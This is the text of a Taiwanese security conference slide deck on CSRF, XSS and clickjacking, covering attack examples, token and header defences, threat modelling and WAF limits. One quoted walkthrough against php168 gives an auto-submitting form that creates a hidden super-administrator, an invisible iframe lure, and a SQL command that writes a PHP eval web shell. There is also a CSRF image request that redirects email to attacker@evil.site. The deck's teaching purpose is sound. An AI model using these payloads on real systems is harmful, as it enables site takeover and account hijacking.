TAIS 台灣學術資訊安全國際研討會CSRF( 跨站偽冒請求 ) 攻擊的分析與防護

Cross-Site Request Forgery Threat and Mitigation

夏克強麟瑞科技 資深技術顧問CISSP, CHFI, CEH

Why Web application Vulnerable

Improved commercial or in-house application access to information means improved access for hackers?

個人資料交易紀錄客戶資料

Database Servers

Customer InfoBusiness DataTransaction Info

網站應用程式 (Web AP)• 未上線的急於上線• 已上線的年代久遠

75% 攻擊集中於此75% 攻擊集中於此

Network

OperatingSystems

DatabaseServers

OperatingSystems

ApplicationServers

OperatingSystems

WebServers

網路防火牆

IDSIPS

SQL InjectionParameter TamperingXSS, .., etc.

Mapping from 2007 to 2010 Top 10

+

+

--

=

=

OWASP TOP TEN

Cybercrime 威脅 Cyber pickpocketing

BEBLOH, where the malware went beyond “traditional” keylogging by not only stealing credit card information but also accessing the account and transferring funds to another account

Cross-Site Scripting

Reflected XSS, Stored XSS (aka Persistent XSS)Samy WormWeb sites compromised: FBI.gov, CNN.com,

Time.com, Ebay, Yahoo, Apple computer, Microsoft, Zdnet, Wired, and Newsbytes

Top vulnerable weakness in recent yearsWeb sites vulnerable to XSS: searching

page, forum, comment, login page..

Cross-Site Scripting attacksHoaxSteal user’s session Id and cookiesAlmost full control to your browsers such as port scan, keylogger and send requests on behave of the client

Stored Cross-Site Scripting

Application with stored XSS vulnerability

3

2

Attacker sets the trap – update my profile

Attacker enters a malicious script into a web page that stores the data on the server

1

Victim views page – sees attacker profile

Script silently sends attacker Victim’s session cookie

Script runs inside victim’s browser with full access to the DOM and cookies

Custom Code

Accou

nts

Fin

an

ce

Ad

min

istr

ati

on

Tra

nsacti

on

sC

om

mu

nic

ati

on

Kn

ow

led

ge

Mg

mt

E-C

om

merc

eB

us.

Fu

ncti

on

s

Stored & Reflected XSS

Stored XSS guaranteed that victim users will be already accessing the application at the time that the attack strikes

Reflected XSS may try to engineer this situation by persuading the user to log in

Reflected XSS must use some means of inducing users to visit attacker’s crafted URL

Phishing attack by offering a link to his own malicious web server would be suspected as a scam The requirement for stored XSS is avoided

Stored XSS(aka Persistent XSS) is more serious than reflected XSS

Clickjacking是攻擊者試圖綁架使用者的滑鼠點擊，讓使用者在不知情的情況下點擊攻擊者精心設計的連結或按鈕

Clickjacking可視為是一種進階的網路釣魚手法Clickjacking (Session-Riding) 與 CSRF 相似，都是讓使用者在 不自覺的狀況上當Clickjacking 與 CSRF結合 對攻擊有加乘效果

Clickjacking( 點擊綁架 )

使用 Firefox 的 Noscript 的 ClearClick功能阻擋 iframe的執行 (NoScript)或停用 Javascript

Frame busting(也就是 anti-framing) for your own sites<script>if (top != self) top.location = location</script>

IE8 针對 Clickjacking增加 對 Clickjacking攻擊的防禦功能

X-FRAME-OPTIONS: DENYX-FRAME-OPTIONS: SAMEORIGIN

Clickjacking 防禦

Forced Browsing

<html><body>空白頁<iframe src=http://www.google.com.tw/search?hl=zh-TW &q=taiwan+taipei height=0 width=0></body></html>

應用 : 廣告收入技巧 : 數以千計的人點擊 , 來自不同 IP 地址 , 可以規避檢查機制

Cross-Site Request Forgery

CSRF example: 進一步

引誘你點選連結

假如你訪問的購物網站網址為：http://www.hacker.net ，你購買了一個產品，購物網站參數為：http://www.hacker.net/buy.php?item=computer&quantity=1這是一個正常的 HTTP 請求，商品名稱是電腦 computer ，購買數量是 1 ，網站會將所買的商品與數量記錄在用戶的帳戶內。如果黑客知道了 http://www.hacker.net 購物網站的操作流程，他就可以偽造一個類似的 HTTP 請求： http://www.hacker.net/buy.php?item=computer&quantity=1000 ，商品名稱是 computer ，而購買數量卻是 1000 。如果目標用戶在網站登錄期間不小心訪問了這個鏈接，那麼在他的帳戶內就是會有一條記錄是購買 1000 台的 computer

php168 之 CSRF 攻擊

加入網站管理員的頁面為 :

http://192.168.0.3/php168/admin/index.php?lfj=member&job=addmember

摘錄自 www.haik8.com

<form name="form1" method="post" action="index.php?lfj=member&action=addmember">     <tr class="head">        <td colspan="2"> 添加新用户 </td>     </tr>     <tr bgcolor="#FFFFFF">        <td width="37%"> 帐号 :</td>       <td width="63%">          <input type="text" name="postdb[username]">       </td>     </tr>     <tr bgcolor="#FFFFFF">        <td width="37%"> 密码 :</td>       <td width="63%">          <input type="password" name="postdb[passwd]">       </td>     </tr>     <tr bgcolor="#FFFFFF">        <td width="37%"> 重复密码 :</td><td width="63%">          <input type="password" name="postdb[passwd2]">       </td>     </tr>

     <tr bgcolor="#FFFFFF"> 

      

摘錄自 www.haik8.com

php168 之 CSRF 攻擊

       <td width="37%"> 所属用户组 :<span help=1> 只有超级管理员与创建人才能添加新的超级管理员 , 只有超级管理员与创始人及前台管理员才能添加新的前台管理员 </span></td>       <td width="63%"> <select name='postdb[groupid]' ><option value='' selected> 现有用户组 </option>   <option value='2' > 游客组</option>   <option value='3' > 超级管理员 </option>   <option value='4' > 前台管理员 </option>   <option value=''>--+ 以上是系统组，以下是会员组 +--</option>   <option value='8' > 普通会员 </option>   <option value='9' > 高级会员 </option> </select> </td>     </tr>     <tr bgcolor="#FFFFFF">        <td width="37%"> 邮箱 :</td>       <td width="63%">          <input type="text" name="postdb[email]">       </td>     </tr>     <tr bgcolor="#FFFFFF">        <td width="37%">&nbsp;</td>       <td width="63%">          <input type="submit" name="Submit" value=" 提交 ">       </td>     </tr>        </form>

摘錄自www.haik8.com

php168 之 CSRF 攻擊

摘錄自 www.haik8.com

駭客修改程式碼 , 修改完的程式碼如下 :       <html><body onload="document.form1.submit()"> <form name="form1" method="post" action="http://192.168.0.3/php168/admin/index.php?lfj=member&action=addmember">      <input type="hidden" name="postdb[username]" value=' 樱花浪子 '>    <input type="hidden" name="postdb[passwd]" value='nohack'>       <input type="hidden" name="postdb[passwd2]" value='nohack'>   <select name='postdb[groupid]' ><option value='3' selected>    </form> </body></html>

php168 之 CSRF 攻擊

摘錄自 www.haik8.com

這樣我們得到路徑為： http://192.168.0.3/php168/upload_files/special/5_20090425170444_eA==.htm ，這樣管理員在登錄前後台的情況下訪問了這個頁面就會添加一個用戶名為“櫻花浪子”、密碼為“ nohack” 的超級管理員

php168 之 CSRF 攻擊

摘錄自 www.haik8.com

但是這樣的話會顯示添加管理員成功的提示，我們要做的隱藏點，來做一個圖片木馬<html><body><iframe src=http://192.168.0.3/php168/upload_files/special/5_20090425170444_eA==.htm width=0 height=0></iframe> <img src=/Article/UploadPic/2010-4/2010417144022600.jpg></img> </body> <html>   得到路徑為 special/5_20090426220451_PYwLh.jpg ，http://192.168.0.3/php168/upload_files/ special/5_20090426220451_PYwLh.jpg

php168 之 CSRF 攻擊

摘錄自 www.haik8.com

執行：“ SELECT ‘<?php @eval($_POST[cmd]);?>’ into outfile ‘C:\ \AppServ\\www\\php168\\nohack.php’”

php168 之 CSRF 攻擊

摘錄自 www.haik8.com

檢查一下 , 顯示已經注入了 !!

php168 之 CSRF 攻擊

行事曆系統範例http://egw.ringline.com.tw/index.php?menuaction=calendar.calendar_uiviews.day&date=20110308

CSRF, Referrer 與 X Headers 範例

強迫 victim 讀取行事曆特定日期Countermeasures against CSRF

Clickjacking 與 CSRF 有加乘效果使用 iframe Opacity=30

<a href=‘http://egw.ringline.com.tw/index.php?menuaction= calendar.calendar_uiviews.day&date=20101016> 請點我可打折 </a>

CSRF PreventionsInsert custom random tokens into every form and URL

Store a single token in the session and add it to all forms and linksHidden Field: <input name="token"

value="687965fdfaew87agrde" type="hidden"/>Single use URL: /accounts/687965fdfaew87agrdeForm Token: /accounts?auth=687965fdfaew87agrde …

For sensitive data or value transactions, re-authenticate or use transaction signing

Verify Referrer header, but XHR can break it.Verify X-header. It is more effective than Referrer header due to

SOP.legal example:GET /auth/update_profile.cgi?email=victim@social.site HTTP/1.1Host: social.siteX-CSRF: 1Illegal example:<html><img src=http://social.site/auth/update_profile.cgi?

email=attacker@evil.site></html>

GET /auth/update_profile.cgi?email=attacker@evil.site HTTP/1.1Host: social.site

Ensure that there are no XSS vulnerabilities in your application

Ratproxy

Semi-auto web application securityassessment tool for XSS, CRSF

Findings should be validated by manualtesting and analysis where appropriate

Not all of the issues reported necessarily correspond to actual security flaws

Microsoft Threat Modeling

Denial of service

Elevation of privilege

Spoofing identity

Information disclosure

Repudiability

Tampering with data(integrity)

Threats

Affected users

Discoverability

Damagepotential

Exploitability

Reproducibility

Rating

SSSS

TTTT

RRRR

IIII

DDDD

EEEE

DDDD

AAAA EEEE

RRRR

DDDD

Microsoft Threat Modeling

1. Identify assets

2. Create an architecture overview3. Decompose the application

4. Identify the threats

5. Document the threats

6. Rate the threats

OWASP Risk Methodology

CSRF Rating Example

CVSS (Metrics View)

Obstacle for Code Review(or Scanners)

5

4

3

2

1

• Can’t provide immediate protection• Web applications, change frequently. In many cases the application can change before a full review cycle has been completed• The source code is not readily “available” or “understood”• With enough MIS staffs and time to do re-coding ?

• Manual code fixes are only as good as the developer

• Attacks, (again, especially Web attacks), also change frequently. • No multiple services correlation capability• Can’t track the accurate user who launches the attacks and the attack patterns

Continued

10

9

8

7

6• Suitable for developing phase, not for production phase• Suitable for developing phase, not for design phase (only resolved by Risk Analysis)

• Slow response to compliance requirements

• Can’t protect web servers and backend database servers

• No web site cloaking such as anti Google hack

• Can’t provide additional insight into those that are requiring writing to the database or are accessed by transaction only

5

4

3

2

1 • Suitable for production phase, not for developing phase

• Suitable for developing phase, not for design phase (only resolved by Risk Analysis) • Lack of Logical flaws detection (only resolved by human code review)• Applications do something insecure

• Can’t accurately correct application flaws

• WAF could go down (fail-open or fail-close)

Obstacle for WAFs

問題與討論

Thank you!

Michael_Shiah@ringline.com.tw

02-26512340#699